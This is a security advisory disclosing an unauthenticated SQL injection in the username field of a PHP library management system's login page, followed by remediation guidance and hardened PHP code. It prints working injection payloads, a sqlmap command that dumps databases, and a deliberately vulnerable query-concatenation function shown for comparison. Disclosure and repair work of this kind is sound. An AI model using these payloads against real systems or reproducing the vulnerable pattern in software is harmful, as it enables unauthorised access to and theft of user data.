# 🚨 Vulnerability Report: Code-Projects Library System Project V1.0 index.php SQL Injection

## 📑 Summary
| Detail | Content |
|---|---|
| Affected Product Name | Library System |
| Affected Version | V1.0 |
| Vendor Homepage | https://code-projects.org/library-system-in-php-with-source-code/ |
| Vulnerability Type | SQL Injection (SQLi) |
| Affected File | /index.php |
| Affected Parameter | username (POST) |
| Authentication Required | None (No login or authorization required to exploit) |
| Submitter | yudeshui |
## 💥 Description and Impact

### Root Cause
The vulnerability resides in the file /index.php, where the application processes user-supplied input from the username parameter. The program directly concatenates this parameter value into the SQL query string without sufficient cleaning, validation, or sanitization.
### Impact
A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including:
- Unauthorized Database Access: Stealing sensitive data such as user information or book records.
- Data Tampering/Destruction: Modifying, deleting, or adding records in the database.
- System Control: In severe cases, gaining system-level control, posing a serious threat to system security and business continuity.
## 🛠️ Vulnerability Details and PoC

The vulnerability is located in the processing of the username parameter within a POST request.

### PoC Payload Examples

The following are examples of SQL injection payloads captured during testing with the sqlmap tool:

```text
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: username=admin%' OR NOT 8371=8371#&password=test&login=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin%' AND (SELECT 7134 FROM (SELECT(SLEEP(5)))Gqyv) AND 'pTUC%'='pTUC&password=test&login=Login
---
```

### Sqlmap Screenshot Example (Database Enumeration)

```shell
sqlmap -u "http://dede:802/index.php" --data="username=admin&password=test&login=Login" --batch --dbs --dump
```
## ✅ Suggested Repair Measures

To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended:

### 1. Use Prepared Statements and Parameter Binding (Primary Defense)

This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code.

- Action: Rewrite all database queries in `/index.php` (and all other files) to use prepared statements (e.g., using `mysqli_prepare()` or PDO with parameter binding).
### 2. Strict Input Validation and Filtering

Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length.

- Action: For parameters like `username` which should be numeric, use PHP functions like `filter_var()` or `is_numeric()` for strict checking.
### 3. Minimize Database User Permissions

Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions.

- Action: Ensure the application's database user does not have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach.
### 4. Regular Security Audits
Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited.
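The following PHP is an added example written for this report and is not code from the Library System project. It shows the concatenation pattern the Root Cause section describes next to a hardened login check that applies measures 1 and 2 (prepared statement with parameter binding, plus whitelist validation of `username`). The table name `users`, the columns `username` and `password_hash`, the helper names, and the connection credentials are all assumptions, since the project's schema is not shown in the report.

```php
<?php
declare(strict_types=1);

// --- Vulnerable pattern, as described in the report (for comparison only) ---
// The request parameter is spliced straight into the SQL text, so the value
// becomes part of the query structure instead of being treated as data.
function vulnerableLogin(mysqli $db, string $username, string $password): bool
{
    $sql = "SELECT id FROM users WHERE username = '" . $username
         . "' AND password = '" . $password . "'";
    $result = $db->query($sql);
    return $result !== false && $result->num_rows > 0;
}

// --- Hardened version -------------------------------------------------------

// Measure 2: whitelist validation. Accept only 3-32 characters from a fixed
// alphabet. (Assumed policy; adjust the pattern to the site's real rules.)
function validateUsername(string $username): bool
{
    return preg_match('/^[A-Za-z0-9._-]{3,32}$/', $username) === 1;
}

// Measure 1: the SQL text is fixed at prepare() time; the username travels to
// the server as a bound parameter and can never alter the WHERE clause.
// Passwords are compared against a stored password_hash() value, never as
// plaintext in the query.
function secureLogin(mysqli $db, string $username, string $password): bool
{
    if (!validateUsername($username)) {
        return false;
    }

    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ? LIMIT 1');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($hash);
    $found = $stmt->fetch();
    $stmt->close();

    if (!$found) {
        // Verify against a dummy hash so unknown and known usernames take
        // comparable time (limits account enumeration via response timing).
        static $dummy = null;
        $dummy ??= password_hash('dummy-password', PASSWORD_DEFAULT);
        password_verify($password, $dummy);
        return false;
    }
    return password_verify($password, $hash);
}

// Usage (assumed connection parameters). Measure 3: 'library_app' should be a
// dedicated account granted only SELECT/INSERT/UPDATE/DELETE on the library
// database, e.g.
//   GRANT SELECT, INSERT, UPDATE, DELETE ON library.* TO 'library_app'@'localhost';
$db = new mysqli('127.0.0.1', 'library_app', 'app-password', 'library');
$db->set_charset('utf8mb4');

$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';

if (secureLogin($db, $username, $password)) {
    echo 'login ok';
} else {
    echo 'invalid credentials';
}
```

Note that validation and prepared statements are complementary, not alternatives: the bound parameter is what stops the injection, while the whitelist rejects obviously malformed input early and keeps unexpected characters out of the rest of the application.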